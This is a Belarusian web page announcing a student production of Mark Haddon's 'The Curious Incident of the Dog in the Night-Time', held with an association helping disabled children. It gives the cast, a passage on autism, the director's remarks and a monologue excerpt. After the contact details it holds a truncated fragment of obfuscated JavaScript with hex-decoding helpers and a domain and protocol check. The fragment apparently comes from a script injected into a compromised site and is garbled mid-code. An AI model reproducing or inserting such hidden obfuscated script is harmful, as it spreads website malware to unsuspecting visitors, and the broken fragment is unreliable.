Цвет сайта
Изображения
Расстояние между буквами
Шрифт

Таямнічае начное забойства сабакі

13020281_1017919121634736_1437378448_nПа шматлiкiх просьбах 29 чэрвеня ў Нацыянальным акадэмічным тэатры імя Янкі Купалы тэатральны праект Андрэя Саўчанкі і грамадскае аб’яднанне “Беларуская асацыяцыя дапамогі дзецям-інвалідам і маладым інвалідам” (ГА “БелАДДІіМІ”) пры падтрымцы ААТ “Прiopбанк” прапануюць праект драматычны спектакль па творы ангельскага пісьменніка Марка Хэдана “Таямнічае начное забойства сабакі”  (Mark Haddon “The Curious Incident of the Dog in the night-time”).

Рэжысёр-пастаноўшчык: Андрей Саўчанка
Мастак: Юрый Вінаградаў
Музыка: Аляксей Варсоба (Port-Mone)

Акторы: 4 курс “Акторы драматычнага тэатра і кіно”
Беларускай дзяржаўнай акадэміі мастацтваў (Майстэрня Народнага артыста Беларусі Мікалая Кірычэнкі)

Новы склад:

Крыстафер – Сяргей Хадзькоў
Джудзі, матуля Крыстафера – Валерыя Мельнік
Эд, тата Крыстафера – Андрэй Корзан
Шыван, настаўніца – Паліна Дабравольская
Пацук Тобі, місіс Александэр, Жанчына-паліцэйскі – Аляксандра Грыбко
Місіс Шырз – Барбара Зайцава, Вольга Мядзведзь
1-ы паліцэйскі – Павел Паўлюць
2-і паліцэйскі, Роджэр Шырз – Дзмітрый Рубель
Дзядзька Тэры, Інспектар – Мікола Варабей
Місіс Гаскойн, дырэктарка спецшколы – Дар’я Пармененкова
Суседзі, настаўнікі, жыхары Суіндана і Лёндана – Раман Шыцько, Барбара Зайцава, Вольга Мядзведзь.

Для Беларусі, як і для многіх іншых краін, сёння актуальная праблема дзіцячага аўтызму. Аўтызм называюць хваробай цывілізацыі. Паводле дадзеных СААЗ, колькасць дзяцей з гэтым дыягназам расце на 13 працэнтаў у год. Гэта асаблівасць псіхічнага развіцця, звязаная галоўным чынам з парушэннем кантакту з навакольнымі, эмацыйнай халоднасцю і стэрэатыпнасцю дзейнасці. Дзіця з аўтызмам можа з’явіцца ў любой сям’і, не залежна ад прыбыткаў, адукацыі і сацыяльнага статусу бацькоў.

«Да мяне звярнуліся арганізатары і прапанавалі некалькі матэрыялаў, – распавёўАндрэй Саўчанка, рэжысер-пастаноўшчык спектакля, — Мне падалося, што ў такім варыянце, які мы падрыхтавалі, Хэдан можа прагучаць сапраўды кранальна.

Я ўявіў, што са студэнтамі гэтая пастаноўка можа атрымацца больш пранікнёнай. Першыя спектаклі – гэта толькі спробы. Я думаю, гэтаму матэрыялу патрэбны час, каб удасканаліцца і знайсці сваё месца», – заўважае Андрэй Саўчанка. Для таго, каб зразумець, што адбываецца з такім дзіцем, уявіце сабе, што ўсё, што вы адчуваеце… павялічылася ці зменшылася стакратна. Лёгкія дакрананні могуць выклікаць у вас боль цi, наадварот, моцны ўдар – застацца незаўважаным. Яркая рэч, раней звыклыя гукі стануць палохаць, а гаворка суразмоўцы ператворыцца проста ў мелодыю. Складана такое ўявіць, але можна зразумець, што ў такім выпадку свет людзей і свет рэчаў успрымаюцца інакш…

«…Маё імя Крыстафер Джон Фрэнсіс Бун. Я ведаю ўсе краіны свету, іх сталіцы і ўсе простыя лікі да 7507.

І я прапаную вам сваю руку, калі вы пагаджаецеся, я павяду вас праз гісторыю, якая пачалася з таямнічага забойства сабакі.

Я ўздымаю левую руку і шырока разводжу свае пальцы. Я рыхтуюся да фізічнага кантакту. З вамі. Я хачу правесці вас праз маю гісторыю. Усё гэта было са мной насамрэч.

Калі тата ці хтосьці іншы хоча мяне абняць або засведчыць, што любіць мяне, адзіны магчымы для мяне спосаб – судакрануцца падушачкамі пальцаў. Бо я не люблю, калі да мяне дакранаюцца. І гэта адна з так званых “праблемаў паводзінаў”, якія часам даводзілі маму і тату да сапраўднага шаленства. Напрыклад, я: не размаўляю з людзьмі доўгі час, нічога не ем і не п’ю доўгі час, б’ю рэчы, калі злуюся альбо нечага не разумею, не ўсміхаюся, раздражняюся, калі хтосьці перастаўляе мэблю.

У мяне раней было багата “праблемаў паводзінаў”, але цяпер іх не так шмат, таму што я вырас і магу самастойна прымаць вырашэнні і сам рабіць некаторыя рэчы.

І я прыняў вырашэнне распавесці вам пра тое, што са мной здарылася…»

Тэатральная пастаноўка праходзіць у межах праекта “Мастацтва за інклюзію людзей з інваліднасцю”, скіраванага на пераадоленне існуючых стэрэатыпаў ў дачыненні да людзей з інваліднасцю.

Даведкі: +375296248902
teatrkompania@gmail.com

+375336610385 Ірына

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “belapdi.org”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *